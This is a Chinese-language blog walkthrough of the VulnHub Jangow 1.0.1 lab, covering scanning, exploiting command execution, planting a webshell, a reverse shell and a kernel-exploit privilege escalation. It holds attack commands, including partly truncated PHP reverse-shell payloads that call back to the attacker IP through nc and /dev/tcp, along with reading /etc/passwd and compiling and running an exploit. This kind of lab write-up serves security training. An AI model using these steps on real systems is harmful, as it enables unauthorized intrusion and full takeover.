渗透测试Jangow1.0.1--入门级

渗透测试Jangow101(一)

一、环境搭建

1、靶机:ip:192.168.0.9

靶机下载:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova

2、攻击机:ip:192.168.0.11

3、如何搭建

下载后的文件直接右键打开方式,选择virtualbox(介意使用virtualbox)

image-20220325150146598

渗透测试Jangow1.0.1--入门级_第1张图片

使用virtualbox打开后会显示靶机ip

渗透测试Jangow1.0.1--入门级_第2张图片

二、信息收集

1、nmap扫描开放端口

nmap -sC -sV 192.168.0.9
-sV 扫描目标主机的端口和软件版本
-sC 根据端口识别服务自动调用默认脚本

渗透测试Jangow1.0.1--入门级_第3张图片

这里可以知道目标开启了21和80端口,分别是ftp服务和Apache服务

三、web渗透

1、漏洞发现

开启了80端口,部署的是Apache服务,先去访问一下web服务,看是否有漏洞

渗透测试Jangow1.0.1--入门级_第4张图片

在一个页面找到一个url地址存在参数,页面为空白,参数未被赋值,猜测可能是代码执行漏洞或者命令执行漏洞,经过探测发现是命令执行漏洞。

渗透测试Jangow1.0.1--入门级_第5张图片

2、漏洞利用

cat /etc/passwd

通过linux命令查看其账号密码

渗透测试Jangow1.0.1--入门级_第6张图片

虽然获取了文件内容,但是无法直接登录。既然可以执行linux命令,尝试写一句话木马直接getshell

echo '' >> getshell.php
这里介意使用post方法,get方法蚁剑无法连接

渗透测试Jangow1.0.1--入门级_第7张图片

蚁剑连接

渗透测试Jangow1.0.1--入门级_第8张图片

连接成功

渗透测试Jangow1.0.1--入门级_第9张图片

收集信息,扩大战果

渗透测试Jangow1.0.1--入门级_第10张图片

渗透测试Jangow1.0.1--入门级_第11张图片

找到两个密码,但是并没有找到flag,应该值root目录,我们现在没有权限,尝试反弹shell,查看系统版本,使用系统内核漏洞提权

3、反弹shell

使用蚁剑新建一个php文件,写一个反弹shell在PHP文件里,使用kali监听对于端口,然后访问该文件,即可反弹shell

nc -lvp 443

image-20220325154630402

&1|nc 192.168.0.11 443 >/tmp/f');?>

 /dev/tcp/192.168.0.11/443 0>&1 2>&1')?>
不知道为啥bash反弹不能使用

image-20220325154413017

访问该文件

渗透测试Jangow1.0.1--入门级_第12张图片

反弹成功

渗透测试Jangow1.0.1--入门级_第13张图片

切换完整的交互式bash

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20220325155134405

四、权限提升

1、查看系统版本

uname -a

渗透测试Jangow1.0.1--入门级_第14张图片

2、根据系统版本提权

searchsploit ubuntu 4.4.0

渗透测试Jangow1.0.1--入门级_第15张图片

3、采用45010.c这个文件进行提权

蚁剑将该文件上传到靶机

渗透测试Jangow1.0.1--入门级_第16张图片

4、提权

gcc 45010.c -o exp //生成可执行文件
chmod +x exp //添加可执行权限
./exp   //执行exp文件

渗透测试Jangow1.0.1--入门级_第17张图片

5、查询root目录

渗透测试Jangow1.0.1--入门级_第18张图片

发现proof.txt文件

渗透测试Jangow1.0.1--入门级_第19张图片

五、解密flag

在proof.txt文件中找到一串加密乱码,可能是md5加密后的flag,解密后可得flag

渗透测试Jangow1.0.1--入门级_第20张图片

解密为空密码,不知道为啥。。。

你可能感兴趣的:(渗透测试,Jangow1.0.1,web安全,安全漏洞)